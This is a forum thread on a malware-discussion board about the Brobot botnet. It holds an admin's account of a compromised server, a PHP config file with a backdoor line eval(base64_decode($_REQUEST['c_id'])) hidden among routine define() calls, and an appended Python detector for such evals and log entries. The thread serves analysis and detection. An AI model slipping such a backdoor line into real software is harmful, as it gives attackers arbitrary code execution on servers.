Brobot

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Brobot

Postby spamislame » Thu May 02, 2013 5:58 pm

Hi

Has anybody here heard about this?

Anybody interested in what it does? :) I had a really interesting few weeks investigating a client's hijacked server. Nobody's written anything detailed publicly about this exploit and it's been interesting discovering how it all works.

Will post more hopefully very soon but wondered if anyone has already heard of this.

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Brobot

Postby Red Dwarf » Fri May 03, 2013 3:59 am

According to an FBI report it is "the botnet used by the hacktivist group Izz ad-Din al-Qassam Cyber Fighters"

An update (April 2013) from the FBI noted some additional scripts in Brobot

More background on the bank attacks at this blog
http://blogs.csoonline.com/malwarecyber ... resilience
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10487
Joined: Tue Jun 27, 2006 2:01 am

Re: Brobot

Postby NotBuyingIt » Fri May 03, 2013 12:52 pm

NotBuyingIt
Spammer Killing Machine
 
Posts: 611
Joined: Sun Jun 13, 2010 5:22 pm

Re: Brobot

Postby spamislame » Sun May 05, 2013 10:35 am

Hello at last.

I have a week off - staycation - during which I'm mostly just relaxing, organizing my apartment, doing social things, etc. So I'll be in and out.

Sadly: I left all my brobot research at work, so I will paraphrase my evidence.

The "brobot" botnet is really a collection of really stupidly configured websites operated by ISPs who do not put security in a very high priority.

The ISP who was hosting the compromised server I was asked to investigate wasn't performing any logging since that "ate up a lot of disk space" and they're running the "zeus" web server - not to be confused with the "zeus" malware.

Nutshell: Brobot consists of really non-secure web servers that allow a PHP script to execute pretty much ANY command a user wants it to execute.

Those commands include:

- Stop logging any errors.
- Allow my script to run indefinitely
- Allow my script to attempt to upload or check the status of malicious files on several dozen external web servers that I believe are similarly insecure.

That's bad.

The example I found uses a fairly benign file that looks like it's just setting a bunch of global parameters and not much else. But tucked away inside that is a single line that executes an "eval" of a base-64 decoded parameter.

That parameter can contain any PHP command, and does indeed include the above two examples. It's an extremely dangerous file but it doesn't look like it is because it's filled with so much simple, routine functionality.

The bigger problem is: when I found this out, and when I was able to put in some extra logging to determine this, I contacted the 30 most commonly implemented external hosting companies. Most of them replied with "our server isn't infected. You don't know what you're talking about." They didn't even look into any of what I was telling them. They didn't disallow really majorly bad commands from continuing to be run on their servers, and in many cases they felt it was a burden to start logging anything.

The Brobot Botnet is not this "highly organized" criminal organization. Any one of you could choose a server and get it to do whatever you want. That doesn't mean you're now part of an organized criminal operation.

The media is doing a terrible job of reporting about this exploit, and worse than that: all security firms are only treating brobot as if it were a desktop infection, completely ignoring the fact that it can run on servers.

I'll post examples of what I found most likely next week. If I can find anything sooner I will post that too.

fyi

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Brobot

Postby MysteryFCM » Wed Jan 08, 2014 9:03 pm

Any chance you managed to get a copy of the files for this please?
MysteryFCM
Getting started
 
Posts: 23
Joined: Wed Jul 25, 2012 7:29 pm

Re: Brobot

Postby spamislame » Mon Jan 13, 2014 6:28 pm

Hi

In a way, yes I did.

The files are not that obscure.

All that the hackers did was exploit obvious holes in php and apache (very old versions) and were able to force a php file onto the server. It seems pretty innocuous on the surface. Can you guess which line is the real culprit for this "infection"?

Code:
<?PHP
define('REAL_SERVER_ROOT', 'SERVER');
//DIR
define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR);
define('KERNEL_DIR', 'kernel');
define('SERVICES_DIR', 'services');
define('LIBRARIES_DIR', 'libs');
define('FRAMEWORKS_DIR', 'Frameworks');
define('IMPLEMENTATIONS_DIR', 'implementations');
define('EXTERN_DIR', 'extern');
//APP
define('APPS_DIR', 'apps');
define('USERS_DIR', 'users');
define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
define('USERS_CONF_DIR', 'conf');
define('USERS_FILES_DIR', 'files');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
define('WORKGROUPS_DIR', 'workgroups');
define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR);
//CONF
define('WORKGROUPS_CONF_DIR', 'conf');
define('WORKGROUPS_FILES_DIR', 'files');
define('WORKGROUPS_METAFILES_DIR', 'metafiles');
define('WORKGROUPS_META_DIR', 'meta');
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
?>

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am
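Added example for the two SiL posts above (not code from the thread or from the file SiL posted): a small Python scanner that (a) walks PHP source for an eval() whose argument reaches into a request superglobal, which is exactly how the one bad line hides among the define() calls, and (b) pulls the backdoor's parameter out of web-server access-log lines and decodes it, so an admin who does turn logging on can see what a request actually asked the file to run. The sample PHP and the log lines are constructed to mirror the thread; the parameter name c_id comes from the posted file, while the decoded payload (error_reporting(0); set_time_limit(0);) is my assumption for what "stop logging errors" and "run indefinitely" look like in PHP.

```python
"""Detect request-driven eval() backdoors in PHP source and in access logs.

Constructed example; the sample file, the log lines and the payload guess
below are assumptions, not artefacts from the forum thread.
"""
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed PHP mimicking the posted file: routine define() lines with one
# ternary that evals a base64-decoded request parameter named c_id.
SAMPLE_PHP = """<?PHP
define('SERVER_ROOT', '.');
define('SYSTEM_CONF_DIR', 'conf');
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SERVER_ROOT . '/skel');
define('USERS_META_DIR', 'meta');
?>
"""

EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)
SUPERGLOBAL_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER)\s*\[")
# Decoders commonly wrapped around the request value to hide the payload.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13", "strrev")


def _balanced_argument(text, open_idx):
    """Return the text inside the parenthesis opened at open_idx, or None if unbalanced."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    return None


def scan_php(source):
    """Return one finding per eval() whose argument is fed from a superglobal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in EVAL_RE.finditer(line):
            arg = _balanced_argument(line, m.end() - 1)  # m.end()-1 is the "("
            if arg is None or not SUPERGLOBAL_RE.search(arg):
                continue
            findings.append({
                "line": lineno,
                "decoders": [d for d in DECODERS if d in arg.lower()],
                "argument": arg,
            })
    return findings


# Constructed combined-format log lines. The c_id value is the base64 of an
# assumed payload that disables error output and removes the time limit.
_ASSUMED_PAYLOAD = b"error_reporting(0); set_time_limit(0);"
_B64 = quote(base64.b64encode(_ASSUMED_PAYLOAD).decode(), safe="")
LOG_LINES = [
    f'203.0.113.5 - - [13/Jan/2014:18:28:01 +0000] "GET /server/conf.php?c_id={_B64} HTTP/1.1" 200 12',
    '198.51.100.7 - - [13/Jan/2014:18:28:05 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
]


def suspicious_requests(log_lines, param="c_id"):
    """Return log lines carrying a base64-decodable value for the backdoor parameter."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get(param, []):
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            hits.append({"line": line, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        print(f"line {f['line']}: eval fed from request via {f['decoders']}: {f['argument']}")
    for h in suspicious_requests(LOG_LINES):
        print("request would run:", h["decoded"])
```

The source scan deliberately ignores how the eval() is wrapped (ternary, error-suppression @, extra whitespace) and only asks whether its argument, within the matching parentheses, touches a request superglobal; that is the property that matters, and it is the same check whichever decoder sits in between. The log check is only as good as the logging the host keeps, which is the thread's actual complaint.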

